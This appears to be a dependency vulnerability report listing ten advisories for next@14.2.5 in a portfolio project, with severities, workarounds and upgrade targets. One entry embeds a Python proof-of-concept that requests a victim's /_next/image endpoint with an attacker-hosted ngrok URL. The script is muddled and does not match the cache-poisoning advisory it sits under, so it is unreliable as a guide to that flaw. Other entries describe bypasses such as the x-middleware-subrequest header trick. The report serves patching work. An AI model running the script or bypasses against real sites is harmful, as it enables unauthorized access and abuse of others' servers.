Find, fix and prevent vulnerabilities in your code.
critical severity
- Vulnerable module: next
- Introduced through: next@14.2.5
Detailed paths
-
Introduced through: portfolio@BawnX/portfolio-allian#3765c66081785d533090b6f9194185f3d457bbd3 › next@14.2.5Remediation: Upgrade to next@14.2.25.
Overview
next is a react framework.
Affected versions of this package are vulnerable to Improper Authorization due to the improper handling of the x-middleware-subrequest
header. An attacker can bypass authorization checks by sending crafted requests containing this specific header.
Workaround
This can be mitigated by preventing external user requests which contain the x-middleware-subrequest
header from reaching your Next.js
application.
Remediation
Upgrade next
to version 12.3.5, 13.5.9, 14.2.25, 15.2.3, 15.3.0-canary.12 or higher.
References
high severity
- Vulnerable module: next
- Introduced through: next@14.2.5
Detailed paths
-
Introduced through: portfolio@BawnX/portfolio-allian#3765c66081785d533090b6f9194185f3d457bbd3 › next@14.2.5Remediation: Upgrade to next@14.2.10.
Overview
next is a react framework.
Affected versions of this package are vulnerable to Acceptance of Extraneous Untrusted Data With Trusted Data by sending a crafted HTTP request, which allows the attacker to poison the cache of a non-dynamic server-side rendered route in the page router. This will coerce the request to cache a route that is meant to not be cached and send a Cache-Control: s-maxage=1, a stale-while-revalidate
header, which some upstream CDNs may cache as well.
Note:
This is only vulnerable if:
The user is using pages router
The user is using non-dynamic server-side rendered routes.
Users are not affected if:
They are using the app router
The deployments are on Vercel
PoC
import shutil
import os
import requests
from urllib.parse import quote
import time #Import the time module
source_image = "chillguy.jpg" #Image file
attacker_url_base = "your_ngrok_url" #your ngrok url
upload_endpoint = "https://victim_url.com" #victim url
def copy_and_upload_image(file_name, num_copies):
if not os.path.exists(source_image):
print(f"File {source_image} not found")
return
for i in range(1, num_copies + 1):
new_image_name = f"chillguy{i}.jpg"#change the name of image file too if you change at line 7 before
# image file increment
shutil.copy(source_image, new_image_name)
print(f"Copy of: {new_image_name}")
# URL combination
image_url = f"{upload_endpoint}/_next/image?url={attacker_url_base}/{new_image_name}&w=256&q=100"
# Deactive SSL verification
try:
response = requests.get(upload_endpoint, verify=False)
if response.status_code == 200:
print(f"Image {new_image_name} uploaded to {upload_endpoint}, url: {image_url}")
else:
print(f"Failed to upload {new_image_name}. Status: {response.status_code}, Response: {response.text}")
except Exception as e:
print(f"Error {new_image_name}: {e}")
# 1 minute delay
print(f"Wait a minute... {new_image_name}...")
time.sleep(60)
# delete copy of image file on your local system
os.remove(new_image_name)
print(f"Delete: {new_image_name}")
#input
try:
num_copies = int(input("Enter how many copies of your image: "))
copy_and_upload_image("chillguy.jpg", num_copies)#change the name of image file too if you change at line 7 before
except ValueError:
print("Please input number only.")
Remediation
Upgrade next
to version 13.5.7, 14.2.10 or higher.
References
high severity
new
- Vulnerable module: next
- Introduced through: next@14.2.5
Detailed paths
-
Introduced through: portfolio@BawnX/portfolio-allian#3765c66081785d533090b6f9194185f3d457bbd3 › next@14.2.5Remediation: Upgrade to next@14.2.32.
Overview
next is a react framework.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the resolve-routes
. An attacker can access internal resources and potentially exfiltrate sensitive information by crafting requests containing user-controlled headers (e.g.,
Location) that are forwarded or interpreted without validation.
Note: This is only exploitable if custom middleware logic is implemented in a self-hosted deployment.
Remediation
Upgrade next
to version 14.2.32, 15.4.2-canary.43, 15.4.7 or higher.
References
high severity
- Vulnerable module: next
- Introduced through: next@14.2.5
Detailed paths
-
Introduced through: portfolio@BawnX/portfolio-allian#3765c66081785d533090b6f9194185f3d457bbd3 › next@14.2.5Remediation: Upgrade to next@14.2.15.
Overview
next is a react framework.
Affected versions of this package are vulnerable to Missing Authorization when using pathname-based checks in middleware for authorization decisions. If i18n configuration is not configured, an attacker can get unintended access to pages one level under the application's root directory.
e.g. https://example.com/foo
is accessible. https://example.com/
and https://example.com/foo/bar
are not.
Note:
Only self-hosted applications are vulnerable. The vulnerability has been fixed by Vercel on the server side.
Remediation
Upgrade next
to version 13.5.8, 14.2.15, 15.0.0-canary.177 or higher.
References
high severity
- Vulnerable module: next
- Introduced through: next@14.2.5
Detailed paths
-
Introduced through: portfolio@BawnX/portfolio-allian#3765c66081785d533090b6f9194185f3d457bbd3 › next@14.2.5Remediation: Upgrade to next@14.2.7.
Overview
next is a react framework.
Affected versions of this package are vulnerable to Uncontrolled Recursion through the image optimization feature. An attacker can cause excessive CPU consumption by exploiting this vulnerability.
Workaround
Ensure that the next.config.js
file has either images.unoptimized
, images.loader
or images.loaderFile
assigned.
Remediation
Upgrade next
to version 14.2.7, 15.0.0-canary.109 or higher.
References
medium severity
- Vulnerable module: next
- Introduced through: next@14.2.5
Detailed paths
-
Introduced through: portfolio@BawnX/portfolio-allian#3765c66081785d533090b6f9194185f3d457bbd3 › next@14.2.5Remediation: Upgrade to next@14.2.21.
Overview
next is a react framework.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the Server Actions process. An attacker can cause the server to hang by constructing requests that leave Server-Actions requests pending until the hosting provider terminates the function execution.
Note:
This is only exploitable if there are no protections against long-running Server Action invocations.
Remediation
Upgrade next
to version 13.5.8, 14.2.21, 15.1.2 or higher.
References
medium severity
- Vulnerable module: next
- Introduced through: next@14.2.5
Detailed paths
-
Introduced through: portfolio@BawnX/portfolio-allian#3765c66081785d533090b6f9194185f3d457bbd3 › next@14.2.5Remediation: Upgrade to next@14.2.24.
Overview
next is a react framework.
Affected versions of this package are vulnerable to Race Condition in the Pages Router
. An attacker can cause the server to serve incorrect pageProps
data instead of the expected HTML content by exploiting a race condition between two requests, one containing the ?__nextDataRequest=1
query parameter and another with the x-now-route-matches
header.
Notes:
This is only exploitable if the CDN provider caches a
200 OK
response even in the absence of explicitcache-control
headers, enabling a poisoned response to persist and be served to subsequent users;No backend access or privileged escalation is possible through this vulnerability;
Applications hosted on Vercel's platform are not affected by this issue, as the platform does not cache responses based solely on
200 OK
status without explicitcache-control
headers.This is a bypass of the fix for CVE-2024-46982
Workaround
This can be mitigated by stripping the x-now-route-matches
header from all incoming requests at your CDN and setting cache-control: no-store
for all responses under risk.
Remediation
Upgrade next
to version 14.2.24, 15.1.6 or higher.
References
medium severity
new
- Vulnerable module: next
- Introduced through: next@14.2.5
Detailed paths
-
Introduced through: portfolio@BawnX/portfolio-allian#3765c66081785d533090b6f9194185f3d457bbd3 › next@14.2.5Remediation: Upgrade to next@14.2.31.
Overview
next is a react framework.
Affected versions of this package are vulnerable to Use of Cache Containing Sensitive Information in the image optimization process, when responses from API routes vary based on request headers such as Cookie
or Authorization
. An attacker can gain unauthorized access to sensitive image data by exploiting cache key confusion, causing responses intended for authenticated users to be served to unauthorized users.
Note: Exploitation requires a prior authorized request to populate the cache.
Remediation
Upgrade next
to version 14.2.31, 15.4.2-canary.19, 15.4.5 or higher.
References
low severity
- Vulnerable module: next
- Introduced through: next@14.2.5
Detailed paths
-
Introduced through: portfolio@BawnX/portfolio-allian#3765c66081785d533090b6f9194185f3d457bbd3 › next@14.2.5Remediation: Upgrade to next@14.2.30.
Overview
next is a react framework.
Affected versions of this package are vulnerable to Missing Origin Validation in WebSockets when running next dev and the project uses the App Router. An attacker can access the source code of client components by exploiting the Cross-site WebSocket hijacking (CSWSH) attack when a user visits a malicious link while having the server running locally.
Workarounds
Avoid browsing untrusted websites while running the local development server.
Implement local firewall or proxy rules to block unauthorized WebSocket access to localhost.
Remediation
Upgrade next
to version 14.2.30, 15.2.2 or higher.
References
low severity
new
- Vulnerable module: next
- Introduced through: next@14.2.5
Detailed paths
-
Introduced through: portfolio@BawnX/portfolio-allian#3765c66081785d533090b6f9194185f3d457bbd3 › next@14.2.5Remediation: Upgrade to next@14.2.31.
Overview
next is a react framework.
Affected versions of this package are vulnerable to Missing Source Correlation of Multiple Independent Data in image-optimizer
. An attacker can cause arbitrary files to be downloaded with attacker-controlled content and filenames by supplying malicious external image sources.
Note: This is only exploitable if the application is configured to allow external image sources via the images.domains
or images.remotePatterns
configuration.
Remediation
Upgrade next
to version 14.2.31, 15.4.2-canary.19, 15.4.5 or higher.